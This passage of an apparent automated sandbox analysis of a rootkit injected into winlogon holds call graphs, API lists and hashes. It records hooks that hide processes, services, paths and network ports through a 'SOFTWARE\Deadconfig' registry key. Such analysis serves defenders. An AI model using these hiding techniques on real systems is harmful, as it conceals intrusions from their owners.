7786 225dc6520d4 _handle_error 7785->7786 7788 225dc652140 _handle_error 7786->7788 7796 225dc652350 7786->7796 7789 225dc65217d 7788->7789 7790 225dc65214d 7788->7790 7803 225dc652688 7789->7803 7799 225dc651f70 7790->7799 7793 225dc65217b _handle_error 7794 225dc647d60 _handle_error 8 API calls 7793->7794 7795 225dc6521a5 7794->7795 7795->7782 7809 225dc652378 7796->7809 7800 225dc651fb4 _handle_error 7799->7800 7801 225dc651fc9 7800->7801 7802 225dc652688 _set_errno_from_matherr 13 API calls 7800->7802 7801->7793 7802->7801 7804 225dc6526a6 7803->7804 7805 225dc652691 7803->7805 7807 225dc64b960 _set_errno_from_matherr 13 API calls 7804->7807 7806 225dc65269e 7805->7806 7808 225dc64b960 _set_errno_from_matherr 13 API calls 7805->7808 7806->7793 7807->7806 7808->7806 7810 225dc6523b7 _raise_exc _clrfp 7809->7810 7811 225dc6525cc RaiseException 7810->7811 7812 225dc652372 7811->7812 7812->7788 7813 225dc645cac 7814 225dc645cb3 7813->7814 7815 225dc645ce0 VirtualProtect 7814->7815 7817 225dc645bf0 7814->7817 7816 225dc645d09 GetLastError 7815->7816 7815->7817 7816->7817 7031 225dc64dba8 7042 225dc64aebc EnterCriticalSection 7031->7042 6824 225dc6429b0 NtEnumerateValueKey 6825 225dc642a54 6824->6825 6828 225dc6429fb 6824->6828 6826 225dc642a08 NtEnumerateValueKey 6826->6828 6828->6825 6828->6826 6829 225dc643c70 6828->6829 6830 225dc643c7d StrCmpNIW 6829->6830 6831 225dc643c92 6829->6831 6830->6831 6831->6828 7818 225dc647eb0 7819 225dc647eb9 __scrt_acquire_startup_lock 7818->7819 7821 225dc647ebd 7819->7821 7822 225dc64a500 7819->7822 7823 225dc64a520 7822->7823 7843 225dc64a537 7822->7843 7824 225dc64a528 7823->7824 7825 225dc64a53e 7823->7825 7827 225dc64b960 _set_errno_from_matherr 13 API calls 7824->7827 7826 225dc64cd58 43 API calls 7825->7826 7828 225dc64a543 7826->7828 7829 225dc64a52d 7827->7829 7853 225dc64c510 GetModuleFileNameW 7828->7853 7830 225dc64b840 _invalid_parameter_noinfo 30 API calls 7829->7830 7830->7843 7837 225dc64a5b5 7840 225dc64b960 _set_errno_from_matherr 13 API calls 7837->7840 7838 225dc64a5cd 7839 225dc64a2e0 33 API calls 7838->7839 7844 225dc64a5e9 7839->7844 7841 225dc64a5ba 7840->7841 7842 225dc64b9f8 __free_lconv_mon 13 API calls 7841->7842 7842->7843 7843->7821 7846 225dc64a61b 7844->7846 7847 225dc64a634 7844->7847 7851 225dc64a5ef 7844->7851 7845 225dc64b9f8 __free_lconv_mon 13 API calls 7845->7843 7848 225dc64b9f8 __free_lconv_mon 13 API calls 7846->7848 7849 225dc64b9f8 __free_lconv_mon 13 API calls 7847->7849 7850 225dc64a624 7848->7850 7849->7851 7852 225dc64b9f8 __free_lconv_mon 13 API calls 7850->7852 7851->7845 7852->7843 7854 225dc64c56a 7853->7854 7855 225dc64c556 GetLastError 7853->7855 7856 225dc64ad0c 33 API calls 7854->7856 7877 225dc64b8f0 7855->7877 7858 225dc64c598 7856->7858 7859 225dc64c5a9 7858->7859 7882 225dc64d614 7858->7882 7885 225dc64c3fc 7859->7885 7860 225dc647d60 _handle_error 8 API calls 7862 225dc64a55a 7860->7862 7865 225dc64a2e0 7862->7865 7864 225dc64c563 7864->7860 7867 225dc64a31e 7865->7867 7869 225dc64a384 7867->7869 7899 225dc64d108 7867->7899 7868 225dc64a473 7871 225dc64a4a0 7868->7871 7869->7868 7870 225dc64d108 33 API calls 7869->7870 7870->7869 7872 225dc64a4f0 7871->7872 7873 225dc64a4b8 7871->7873 7872->7837 7872->7838 7873->7872 7874 225dc64b980 _invalid_parameter_noinfo 13 API calls 7873->7874 7875 225dc64a4e6 7874->7875 7876 225dc64b9f8 __free_lconv_mon 13 API calls 7875->7876 7876->7872 7878 225dc64b4c4 _invalid_parameter_noinfo 13 API calls 7877->7878 7879 225dc64b901 7878->7879 7880 225dc64b4c4 _invalid_parameter_noinfo 13 API calls 7879->7880 7881 225dc64b91a 7880->7881 7881->7864 7883 225dc64d3ec try_get_function 5 API calls 7882->7883 7884 225dc64d634 7883->7884 7884->7859 7886 225dc64c439 7885->7886 7894 225dc64c420 7885->7894 7887 225dc64d1a0 WideCharToMultiByte 7886->7887 7892 225dc64c43e 7886->7892 7888 225dc64c491 7887->7888 7889 225dc64c498 GetLastError 7888->7889 7888->7892 7893 225dc64c4c1 7888->7893 7891 225dc64b8f0 13 API calls 7889->7891 7890 225dc64b960 _set_errno_from_matherr 13 API calls 7890->7894 7895 225dc64c4a5 7891->7895 7892->7890 7892->7894 7896 225dc64d1a0 WideCharToMultiByte 7893->7896 7894->7864 7897 225dc64b960 _set_errno_from_matherr 13 API calls 7895->7897 7898 225dc64c4e8 7896->7898 7897->7894 7898->7889 7898->7894 7900 225dc64d090 7899->7900 7901 225dc64ad0c 33 API calls 7900->7901 7902 225dc64d0b4 7901->7902 7902->7867 7903 225dc652aaf 7904 225dc652ac7 7903->7904 7910 225dc652b32 7903->7910 7904->7910 7911 225dc64977c 7904->7911 7907 225dc64977c 42 API calls 7908 225dc652b29 7907->7908 7917 225dc64ac20 7908->7917 7912 225dc649798 9 API calls 7911->7912 7913 225dc649785 7912->7913 7914 225dc64978a 7913->7914 7915 225dc64acb4 33 API calls 7913->7915 7914->7907 7916 225dc649794 7915->7916 7918 225dc64b348 33 API calls 7917->7918 7919 225dc64ac29 7918->7919 7920 225dc64acb4 33 API calls 7919->7920 7921 225dc64ac3f 7920->7921 7922 225dc6430b0 7924 225dc6430e0 7922->7924 7923 225dc643199 7924->7923 7925 225dc6430fd PdhGetCounterInfoW 7924->7925 7925->7923 7926 225dc64311b GetProcessHeap HeapAlloc PdhGetCounterInfoW 7925->7926 7927 225dc643185 GetProcessHeap HeapFree 7926->7927 7928 225dc64314d StrCmpW 7926->7928 7927->7923 7928->7927 7930 225dc643162 7928->7930 7929 225dc643558 12 API calls 7929->7930 7930->7927 7930->7929 8210 225dc64a13b 8211 225dc64ac20 33 API calls 8210->8211 8212 225dc64a140 8211->8212 8213 225dc647f3c 8215 225dc647f60 __scrt_acquire_startup_lock 8213->8215 8214 225dc649eb9 8215->8214 8216 225dc64b4c4 _invalid_parameter_noinfo 13 API calls 8215->8216 8217 225dc649ee2 8216->8217 7043 225dc652bc2 7044 225dc652bdb 7043->7044 7045 225dc652bd1 7043->7045 7047 225dc64af10 LeaveCriticalSection 7045->7047 7931 225dc6460c3 7932 225dc6460d0 7931->7932 7933 225dc6460dc GetThreadContext 7932->7933 7934 225dc64623a 7932->7934 7933->7934 7935 225dc646102 7933->7935 7937 225dc646261 VirtualProtect FlushInstructionCache 7934->7937 7939 225dc64631e 7934->7939 7935->7934 7936 225dc646129 7935->7936 7942 225dc646186 SetThreadContext 7936->7942 7943 225dc6461ad 7936->7943 7937->7934 7938 225dc64633e 7940 225dc645210 3 API calls 7938->7940 7939->7938 7941 225dc644800 VirtualFree 7939->7941 7946 225dc646343 7940->7946 7941->7938 7942->7943 7944 225dc646397 7947 225dc647d60 _handle_error 8 API calls 7944->7947 7945 225dc646357 ResumeThread 7945->7946 7946->7944 7946->7945 7948 225dc6463df 7947->7948 8218 225dc642344 GetProcessIdOfThread GetCurrentProcessId 8219 225dc6423ea 8218->8219 8220 225dc64236f CreateFileW 8218->8220 8220->8219 8221 225dc6423a3 WriteFile ReadFile CloseHandle 8220->8221 8221->8219 8222 225dc64ab44 8223 225dc64b9f8 __free_lconv_mon 13 API calls 8222->8223 8224 225dc64ab54 8223->8224 8225 225dc64b9f8 __free_lconv_mon 13 API calls 8224->8225 8226 225dc64ab68 8225->8226 8227 225dc64b9f8 __free_lconv_mon 13 API calls 8226->8227 8228 225dc64ab7c 8227->8228 8229 225dc64b9f8 __free_lconv_mon 13 API calls 8228->8229 8230 225dc64ab90 8229->8230 8231 225dc64d940 8232 225dc64d979 8231->8232 8233 225dc64d94a 8231->8233 8233->8232 8234 225dc64d95f FreeLibrary 8233->8234 8234->8233 7591 225dc64e408 7592 225dc64e413 7591->7592 7600 225dc650c64 7592->7600 7613 225dc64aebc EnterCriticalSection 7600->7613 7614 225dc642408 7615 225dc642484 _invalid_parameter_noinfo 7614->7615 7616 225dc6424ea GetFileType 7615->7616 7623 225dc6425c3 7615->7623 7617 225dc64250c 7616->7617 7618 225dc6424f8 StrCpyW 7616->7618 7625 225dc6419d8 GetFinalPathNameByHandleW 7617->7625 7621 225dc642519 7618->7621 7620 225dc643c70 StrCmpNIW 7620->7621 7621->7620 7621->7623 7630 225dc64330c StrCmpIW 7621->7630 7634 225dc641cd4 7621->7634 7626 225dc641a41 7625->7626 7627 225dc641a02 StrCmpNIW 7625->7627 7626->7621 7627->7626 7628 225dc641a1c lstrlenW 7627->7628 7628->7626 7629 225dc641a2e StrCpyW 7628->7629 7629->7626 7631 225dc643355 PathCombineW 7630->7631 7632 225dc64333e StrCpyW StrCatW 7630->7632 7633 225dc64335e 7631->7633 7632->7633 7633->7621 7635 225dc641ceb 7634->7635 7636 225dc641cf4 7634->7636 7637 225dc64152c 2 API calls 7635->7637 7636->7621 7637->7636 7949 225dc64a688 7950 225dc64a6a1 7949->7950 7959 225dc64a69d 7949->7959 7951 225dc64cd58 43 API calls 7950->7951 7952 225dc64a6a6 7951->7952 7961 225dc64d250 GetEnvironmentStringsW 7952->7961 7955 225dc64a6b3 7958 225dc64b9f8 __free_lconv_mon 13 API calls 7955->7958 7958->7959 7960 225dc64b9f8 __free_lconv_mon 13 API calls 7960->7955 7962 225dc64d320 7961->7962 7963 225dc64d27e 7961->7963 7964 225dc64d32a FreeEnvironmentStringsW 7962->7964 7965 225dc64a6ab 7962->7965 7966 225dc64d1a0 WideCharToMultiByte 7963->7966 7964->7965 7965->7955 7973 225dc64a6f4 7965->7973 7967 225dc64d2d0 7966->7967 7967->7962 7968 225dc64af2c 14 API calls 7967->7968 7969 225dc64d2df 7968->7969 7970 225dc64d309 7969->7970 7971 225dc64d1a0 WideCharToMultiByte 7969->7971 7972 225dc64b9f8 __free_lconv_mon 13 API calls 7970->7972 7971->7970 7972->7962 7974 225dc64a71b 7973->7974 7975 225dc64b980 _invalid_parameter_noinfo 13 API calls 7974->7975 7982 225dc64a750 7975->7982 7976 225dc64b9f8 __free_lconv_mon 13 API calls 7977 225dc64a6c0 7976->7977 7977->7960 7978 225dc64b980 _invalid_parameter_noinfo 13 API calls 7978->7982 7979 225dc64a7b0 7981 225dc64a7fc 13 API calls 7979->7981 7980 225dc64ac54 __std_exception_copy 30 API calls 7980->7982 7983 225dc64a7b8 7981->7983 7982->7978 7982->7979 7982->7980 7984 225dc64a7e7 7982->7984 7987 225dc64b9f8 __free_lconv_mon 13 API calls 7982->7987 7988 225dc64a7bf 7982->7988 7985 225dc64b9f8 __free_lconv_mon 13 API calls 7983->7985 7986 225dc64b860 _invalid_parameter_noinfo 17 API calls 7984->7986 7985->7988 7989 225dc64a7f9 7986->7989 7987->7982 7988->7976 7048 225dc64eb90 7049 225dc64ebbd 7048->7049 7050 225dc64b960 _set_errno_from_matherr 13 API calls 7049->7050 7055 225dc64ebd2 7049->7055 7051 225dc64ebc7 7050->7051 7053 225dc64b840 _invalid_parameter_noinfo 30 API calls 7051->7053 7052 225dc647d60 _handle_error 8 API calls 7054 225dc64ef1f 7052->7054 7053->7055 7055->7052 8235 225dc64e710 8238 225dc64e694 8235->8238 8245 225dc64aebc EnterCriticalSection 8238->8245 6832 225dc646110 6833 225dc64611d 6832->6833 6834 225dc646129 6833->6834 6841 225dc64623a 6833->6841 6835 225dc64615e 6834->6835 6836 225dc6461ad 6834->6836 6837 225dc646186 SetThreadContext 6835->6837 6837->6836 6838 225dc646261 VirtualProtect FlushInstructionCache 6838->6841 6839 225dc64631e 6840 225dc64633e 6839->6840 6854 225dc644800 6839->6854 6850 225dc645210 GetCurrentProcess 6840->6850 6841->6838 6841->6839 6844 225dc646343 6845 225dc646397 6844->6845 6846 225dc646357 ResumeThread 6844->6846 6858 225dc647d60 6845->6858 6847 225dc64638b 6846->6847 6847->6844 6851 225dc64522c 6850->6851 6852 225dc645242 VirtualProtect FlushInstructionCache 6851->6852 6853 225dc645273 6851->6853 6852->6851 6853->6844 6856 225dc64481c 6854->6856 6855 225dc64487f 6855->6840 6856->6855 6857 225dc644832 VirtualFree 6856->6857 6857->6856 6859 225dc647d69 6858->6859 6860 225dc6463df 6859->6860 6861 225dc64854c IsProcessorFeaturePresent 6859->6861 6862 225dc648564 6861->6862 6867 225dc648740 RtlCaptureContext 6862->6867 6868 225dc64875a RtlLookupFunctionEntry 6867->6868 6869 225dc648577 6868->6869 6870 225dc648770 RtlVirtualUnwind 6868->6870 6871 225dc648518 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6869->6871 6870->6868 6870->6869 7056 225dc64b590 7063 225dc64d650 7056->7063 7064 225dc64d3ec try_get_function 5 API calls 7063->7064 7065 225dc64d678 TlsAlloc 7064->7065 7638 225dc649210 7641 225dc649240 _IsNonwritableInCurrentImage __C_specific_handler __except_validate_context_record 7638->7641 7639 225dc649331 7640 225dc6492fc RtlUnwindEx 7640->7641 7641->7639 7641->7640 7642 225dc642c10 7643 225dc642c81 7642->7643 7644 225dc642e87 7643->7644 7645 225dc642cb1 GetModuleHandleA 7643->7645 7646 225dc642cd5 7645->7646 7647 225dc642cc3 GetProcAddress 7645->7647 7646->7644 7648 225dc642cfc StrCmpNIW 7646->7648 7647->7646 7648->7644 7651 225dc642d21 7648->7651 7649 225dc641934 6 API calls 7649->7651 7650 225dc642e34 lstrlenW 7650->7651 7651->7644 7651->7649 7651->7650 7652 225dc643c70 StrCmpNIW 7651->7652 7653 225dc641bf4 2 API calls 7651->7653 7652->7651 7653->7651 8246 225dc64d11c GetCommandLineA GetCommandLineW 7654 225dc642618 7655 225dc642699 _invalid_parameter_noinfo 7654->7655 7656 225dc6426fe GetFileType 7655->7656 7666 225dc64288f 7655->7666 7657 225dc64270c StrCpyW 7656->7657 7658 225dc642722 7656->7658 7659 225dc642731 7657->7659 7660 225dc6419d8 4 API calls 7658->7660 7663 225dc64273b 7659->7663 7665 225dc6427e0 7659->7665 7660->7659 7661 225dc643c70 StrCmpNIW 7661->7663 7662 225dc643c70 StrCmpNIW 7662->7665 7663->7661 7664 225dc64330c 4 API calls 7663->7664 7663->7666 7667 225dc641cd4 2 API calls 7663->7667 7664->7663 7665->7662 7665->7666 7668 225dc64330c 4 API calls 7665->7668 7669 225dc641cd4 2 API calls 7665->7669 7667->7663 7668->7665 7669->7665 8247 225dc642118 8248 225dc642149 8247->8248 8249 225dc64226e 8248->8249 8253 225dc64216c 8248->8253 8257 225dc642239 8248->8257 8250 225dc642279 8249->8250 8251 225dc6422e8 8249->8251 8264 225dc6431c0 GetProcessHeap HeapAlloc 8250->8264 8254 225dc6431c0 11 API calls 8251->8254 8251->8257 8255 225dc6421b4 StrCmpNIW 8253->8255 8253->8257 8258 225dc641c28 8253->8258 8254->8257 8255->8253 8259 225dc641c5a GetProcessHeap HeapAlloc 8258->8259 8260 225dc641cb4 8258->8260 8259->8260 8261 225dc641c92 8259->8261 8260->8253 8262 225dc641bf4 2 API calls 8261->8262 8263 225dc641c9a GetProcessHeap HeapFree 8262->8263 8263->8260 8266 225dc643213 8264->8266 8265 225dc6432dd GetProcessHeap HeapFree 8265->8257 8266->8265 8267 225dc6432d8 8266->8267 8268 225dc64326a StrCmpNIW 8266->8268 8269 225dc641c28 6 API calls 8266->8269 8267->8265 8268->8266 8269->8266 7990 225dc651ca0 7991 225dc651cb7 7990->7991 7992 225dc651cb1 CloseHandle 7990->7992 7992->7991 7067 225dc642fa0 7068 225dc642fc7 7067->7068 7069 225dc643094 7068->7069 7070 225dc642fe4 PdhGetCounterInfoW 7068->7070 7070->7069 7071 225dc643006 GetProcessHeap HeapAlloc PdhGetCounterInfoW 7070->7071 7072 225dc643038 StrCmpW 7071->7072 7073 225dc643080 GetProcessHeap HeapFree 7071->7073 7072->7073 7075 225dc64304d 7072->7075 7073->7069 7075->7073 7076 225dc643558 StrCmpNW 7075->7076 7077 225dc643586 StrStrW 7076->7077 7085 225dc6435f6 7076->7085 7078 225dc64359f StrToIntW 7077->7078 7077->7085 7079 225dc6435c7 7078->7079 7078->7085 7079->7085 7086 225dc641934 OpenProcess 7079->7086 7082 225dc643c70 StrCmpNIW 7083 225dc6435e8 7082->7083 7083->7085 7092 225dc641bf4 7083->7092 7085->7075 7087 225dc6419ba 7086->7087 7088 225dc641968 K32GetModuleFileNameExW 7086->7088 7087->7082 7087->7085 7089 225dc6419b1 CloseHandle 7088->7089 7090 225dc641982 PathFindFileNameW lstrlenW 7088->7090 7089->7087 7090->7089 7091 225dc6419a0 StrCpyW 7090->7091 7091->7089 7093 225dc641c0b 7092->7093 7094 225dc641c14 7092->7094 7095 225dc64152c 2 API calls 7093->7095 7094->7085 7095->7094

                                                        Executed Functions

                                                        Function 00000225DC6429B0 Relevance: 3.1, APIs: 2, Instructions: 64nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 263 225dc6429b0-225dc6429f9 NtEnumerateValueKey 264 225dc6429fb-225dc6429fe 263->264 265 225dc642a54-225dc642a72 263->265 264->265 266 225dc642a00-225dc642a02 264->266 267 225dc642a04-225dc642a06 266->267 267->265 268 225dc642a08-225dc642a2d NtEnumerateValueKey 267->268 269 225dc642a3e 268->269 270 225dc642a2f-225dc642a32 268->270 271 225dc642a42-225dc642a49 call 225dc643c70 269->271 272 225dc642a38-225dc642a3c 270->272 273 225dc642a34-225dc642a36 270->273 276 225dc642a4b 271->276 277 225dc642a4d-225dc642a52 271->277 272->271 273->271 276->277 277->265 277->267
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: EnumerateValue
                                                        • String ID:
                                                        • API String ID: 1749906896-0
                                                        • Opcode ID: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction ID: e0bf969e9573ba16cdea1d0d60eb7923deb9c3e45bdbfb511f310f72bab8fb95
                                                        • Opcode Fuzzy Hash: c7d29f1da1c35067c358ffcc45280992f1212d67cf94ff1f26cc45362ca16225
                                                        • Instruction Fuzzy Hash: 4C11A23A20CBA092E775DF9EB84461AB394F384B95F618065EE8A83710EF34C4C6C740
                                                        Function 00000225DC641628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: aad90fbc9abf91f474f9009489ed57291f689121fcda537680ac4bbedb82104b
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 7C712F3A324F20A6EB109FA9E85869D37B4F784F8AF509521DE4E47B69EF34C445C740
                                                        Function 00000225DC645F50 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 51 225dc645f50-225dc645f77 52 225dc645f79-225dc645f88 51->52 53 225dc645f8b-225dc645f96 GetCurrentThreadId 51->53 52->53 54 225dc645f98-225dc645f9d 53->54 55 225dc645fa2-225dc645fa9 53->55 56 225dc6463cf-225dc6463e6 call 225dc647d60 54->56 57 225dc645fbb-225dc645fcf 55->57 58 225dc645fab-225dc645fb6 call 225dc645d80 55->58 61 225dc645fde-225dc645fe4 57->61 58->56 64 225dc645fea-225dc645ff3 61->64 65 225dc6460b5-225dc6460d6 61->65 67 225dc64603a-225dc6460ad call 225dc644930 call 225dc6448d0 call 225dc644890 64->67 68 225dc645ff5-225dc646038 call 225dc6489d0 64->68 69 225dc6460dc-225dc6460fc GetThreadContext 65->69 70 225dc64623f-225dc646250 call 225dc6478df 65->70 80 225dc6460b0 67->80 68->80 73 225dc64623a 69->73 74 225dc646102-225dc646123 69->74 84 225dc646255-225dc64625b 70->84 73->70 74->73 83 225dc646129-225dc646132 74->83 80->61 86 225dc6461b2-225dc6461c3 83->86 87 225dc646134-225dc646145 83->87 88 225dc646261-225dc6462b8 VirtualProtect FlushInstructionCache 84->88 89 225dc64631e-225dc64632e 84->89 97 225dc646235 86->97 98 225dc6461c5-225dc6461e3 86->98 93 225dc646147-225dc64615c 87->93 94 225dc6461ad 87->94 95 225dc6462e9-225dc646319 call 225dc647ccc 88->95 96 225dc6462ba-225dc6462c4 88->96 91 225dc64633e-225dc64634a call 225dc645210 89->91 92 225dc646330-225dc646337 89->92 113 225dc64634f-225dc646355 91->113 92->91 101 225dc646339 call 225dc644800 92->101 93->94 103 225dc64615e-225dc6461a8 call 225dc643d90 SetThreadContext 93->103 94->97 95->84 96->95 104 225dc6462c6-225dc6462e1 call 225dc6447b0 96->104 98->97 105 225dc6461e5-225dc646230 call 225dc643d20 call 225dc6478fd 98->105 101->91 103->94 104->95 105->97 117 225dc646397-225dc6463b5 113->117 118 225dc646357-225dc646395 ResumeThread call 225dc647ccc 113->118 120 225dc6463c9 117->120 121 225dc6463b7-225dc6463c6 117->121 118->113 120->56 121->120
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 04eb4b821cfb78ceefbf78a645bcab5cb65f7271ac457b266e4150bc93d30c0d
                                                        • Instruction ID: 6b8e7d18f0b85bd53694ac57d10ebcb7ae98c315cd64fb94ae0e802435b0b8b6
                                                        • Opcode Fuzzy Hash: 04eb4b821cfb78ceefbf78a645bcab5cb65f7271ac457b266e4150bc93d30c0d
                                                        • Instruction Fuzzy Hash: 5DD19C7A21CF9895EA70DB9AE49835A77A0F3C8B85F104156EACE47BA5DF3CC541CB00
                                                        Function 00000225DC6454F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 123 225dc6454f0-225dc64551c 124 225dc64552d-225dc645536 123->124 125 225dc64551e-225dc645526 123->125 126 225dc645547-225dc645550 124->126 127 225dc645538-225dc645540 124->127 125->124 128 225dc645561-225dc64556a 126->128 129 225dc645552-225dc64555a 126->129 127->126 130 225dc64556c-225dc645571 128->130 131 225dc645576-225dc645581 GetCurrentThreadId 128->131 129->128 132 225dc645af3-225dc645afa 130->132 133 225dc645583-225dc645588 131->133 134 225dc64558d-225dc645594 131->134 133->132 135 225dc645596-225dc64559c 134->135 136 225dc6455a1-225dc6455aa 134->136 135->132 137 225dc6455ac-225dc6455b1 136->137 138 225dc6455b6-225dc6455c2 136->138 137->132 139 225dc6455c4-225dc6455e9 138->139 140 225dc6455ee-225dc645645 call 225dc645b00 * 2 138->140 139->132 145 225dc64565a-225dc645663 140->145 146 225dc645647-225dc64564e 140->146 149 225dc645675-225dc64567e 145->149 150 225dc645665-225dc645672 145->150 147 225dc645656 146->147 148 225dc645650 146->148 147->145 152 225dc6456c6-225dc6456ca 147->152 151 225dc6456d0-225dc6456d6 148->151 153 225dc645693-225dc6456b8 call 225dc647c90 149->153 154 225dc645680-225dc645690 149->154 150->149 155 225dc645705-225dc64570b 151->155 156 225dc6456d8-225dc6456f4 call 225dc6447b0 151->156 152->151 163 225dc64574d-225dc645762 call 225dc6440e0 153->163 164 225dc6456be 153->164 154->153 159 225dc645735-225dc645748 155->159 160 225dc64570d-225dc64572c call 225dc647ccc 155->160 156->155 168 225dc6456f6-225dc6456fe 156->168 159->132 160->159 170 225dc645771-225dc64577a 163->170 171 225dc645764-225dc64576c 163->171 164->152 168->155 172 225dc64578c-225dc6457da call 225dc649080 170->172 173 225dc64577c-225dc645789 170->173 171->152 176 225dc6457e2-225dc6457ea 172->176 173->172 177 225dc6458f7-225dc6458ff 176->177 178 225dc6457f0-225dc6458db call 225dc647860 176->178 179 225dc645901-225dc645914 call 225dc6449b0 177->179 180 225dc645943-225dc64594b 177->180 190 225dc6458dd 178->190 191 225dc6458df-225dc6458ee call 225dc644480 178->191 195 225dc645916 179->195 196 225dc645918-225dc645941 179->196 183 225dc645957-225dc645966 180->183 184 225dc64594d-225dc645955 180->184 188 225dc645968 183->188 189 225dc64596f 183->189 184->183 187 225dc645974-225dc645981 184->187 193 225dc645983 187->193 194 225dc645984-225dc6459d9 call 225dc6489d0 187->194 188->189 189->187 190->177 199 225dc6458f2 191->199 200 225dc6458f0 191->200 193->194 202 225dc6459db-225dc6459e3 194->202 203 225dc6459e8-225dc645a81 call 225dc644930 call 225dc644890 VirtualProtect 194->203 195->180 196->177 199->176 200->177 208 225dc645a91-225dc645af1 203->208 209 225dc645a83-225dc645a88 GetLastError 203->209 208->132 209->208
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5da0d5c4ace7b3df51b797f0c4c7771e58ce7a7ec004b9d6d28105fb697354a3
                                                        • Instruction ID: a8847a8707aee4229bb7f638773afa3f00201387ed177329a4ffc1b3de07b110
                                                        • Opcode Fuzzy Hash: 5da0d5c4ace7b3df51b797f0c4c7771e58ce7a7ec004b9d6d28105fb697354a3
                                                        • Instruction Fuzzy Hash: A802EB3A21DB9496EB60CB99F49435AB7A1F3C5795F104055EA8E87BA8DF7CC484CF00
                                                        Function 00000225DC643BB8 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
